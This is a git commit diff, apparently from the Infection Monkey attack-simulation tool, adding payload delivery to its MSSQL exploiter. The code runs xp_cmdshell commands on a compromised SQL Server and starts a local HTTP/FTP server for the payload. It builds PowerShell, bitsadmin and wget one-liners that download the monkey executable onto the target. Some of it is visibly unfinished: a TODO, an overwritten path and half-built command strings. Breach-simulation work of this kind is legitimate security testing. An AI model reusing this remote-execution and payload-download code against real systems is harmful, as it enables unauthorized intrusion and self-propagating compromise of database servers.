Payload creation

This commit is contained in:
VakarisZ 2019-05-13 14:08:30 +03:00
parent 75f26f921e
commit d2b5e314c1
4 changed files with 3462 additions and 3431 deletions

View File

@ -3,8 +3,12 @@ import logging
import pymssql import pymssql
from infection_monkey.exploit import HostExploiter, mssqlexec_utils from infection_monkey.exploit import HostExploiter, mssqlexec_utils, tools
from common.utils.exploit_enum import ExploitType from common.utils.exploit_enum import ExploitType
from infection_monkey.exploit.tools import HTTPTools
from infection_monkey.config import WormConfiguration
from infection_monkey.model import RDP_CMDLINE_HTTP
__author__ = 'Maor Rayzin' __author__ = 'Maor Rayzin'
@ -73,6 +77,31 @@ class MSSQLExploiter(HostExploiter):
chosen_attack = self.attacks_list[0](payload, cursor, self.host) chosen_attack = self.attacks_list[0](payload, cursor, self.host)
# Get monkey exe for host and it's path
src_path = tools.get_target_monkey(self.host)
if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", self.host)
return False
# Create server for http download and wait for it's startup.
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
if not http_path:
LOG.debug("Exploiter failed, http transfer creation failed.")
return False
# TODO choose bit version
dst_path = WormConfiguration.dropper_target_path_win_64
dst_path = "c:\\windows\\temp\\monkey64.exe"
command = RDP_CMDLINE_HTTP % {'http_path': http_path, 'monkey_path': dst_path}
LOG.info("Started http server on %s", http_path)
tmp_file_path = "c:\\windows\\temp\\monkey_tmp.bat"
commands = [r"xp_cmdshell 'echo powershell (new-object System.Net.WebClient).DownloadFile(\" > %s'" % tmp_file_path]
commands2 = [r"xp_cmdshell 'echo powershell >> c:\\windows\\temp\\temp.bat'"]
chosen_attack.execute_command(commands2)
if chosen_attack.send_payload(): if chosen_attack.send_payload():
LOG.debug('Payload: {0} has been successfully sent to host'.format(payload)) LOG.debug('Payload: {0} has been successfully sent to host'.format(payload))
if chosen_attack.execute_payload(): if chosen_attack.execute_payload():

View File

@ -5,6 +5,7 @@ import logging
import pymssql import pymssql
from infection_monkey.exploit.tools import get_interface_to_target from infection_monkey.exploit.tools import get_interface_to_target
from infection_monkey.network.info import get_free_tcp_port
from pyftpdlib.authorizers import DummyAuthorizer from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer from pyftpdlib.servers import FTPServer
@ -21,6 +22,8 @@ FTP_SERVER_PASSWORD = 'force'
FTP_WORK_DIR_WINDOWS = os.path.expandvars(r'%TEMP%/') FTP_WORK_DIR_WINDOWS = os.path.expandvars(r'%TEMP%/')
FTP_WORK_DIR_LINUX = '/tmp/' FTP_WORK_DIR_LINUX = '/tmp/'
UPLOAD_COMMANDS = []
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
@ -54,7 +57,7 @@ class FTP(object):
handler = FTPHandler handler = FTPHandler
handler.authorizer = authorizer handler.authorizer = authorizer
address = (get_interface_to_target(self.dst_ip), FTP_SERVER_PORT) address = (get_interface_to_target(self.dst_ip), get_free_tcp_port())
# Configuring the server using the address and handler. Global usage in stop_server thats why using self keyword # Configuring the server using the address and handler. Global usage in stop_server thats why using self keyword
self.server = FTPServer(address, handler) self.server = FTPServer(address, handler)
@ -103,6 +106,29 @@ class CmdShellAttack(AttackHost):
self.ftp_server, self.ftp_server_p = self.__init_ftp_server(host) self.ftp_server, self.ftp_server_p = self.__init_ftp_server(host)
self.cursor = cursor self.cursor = cursor
self.attacker_ip = get_interface_to_target(host.ip_addr) self.attacker_ip = get_interface_to_target(host.ip_addr)
self.host = host
def execute_command(self, cmds):
ftp_server, ftp_server_p = self.__init_ftp_server(self.host)
if ftp_server_p and ftp_server:
#command = "xp_cmdshell \""+cmd+"\""
#command = "xp_cmdshell \"C:\\download.bat\""
#command = "EXEC xp_cmdshell \"c:\\download.bat\""
try:
# Running the cmd on remote host
for cmd in cmds:
self.cursor.execute(cmd)
sleep(0.5)
except Exception as e:
LOG.error('Error sending the payload using xp_cmdshell to host', exc_info=True)
self.ftp_server_p.terminate()
return False
return True
else:
LOG.error("Couldn't establish an FTP server for the dropout")
return False
def send_payload(self): def send_payload(self):
""" """

View File

@ -18,6 +18,7 @@ DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del
# Commands used for downloading monkeys # Commands used for downloading monkeys
POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\"" POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\""
POWERSHELL_UPLOAD_SHORT = "powershell (new-object System.Net.WebClient).DownloadFile('%(http_path)s','%(monkey_path)s')"
WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s" WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s"
RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s' RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
CHMOD_MONKEY = "chmod +x %(monkey_path)s" CHMOD_MONKEY = "chmod +x %(monkey_path)s"

File diff suppressed because it is too large Load Diff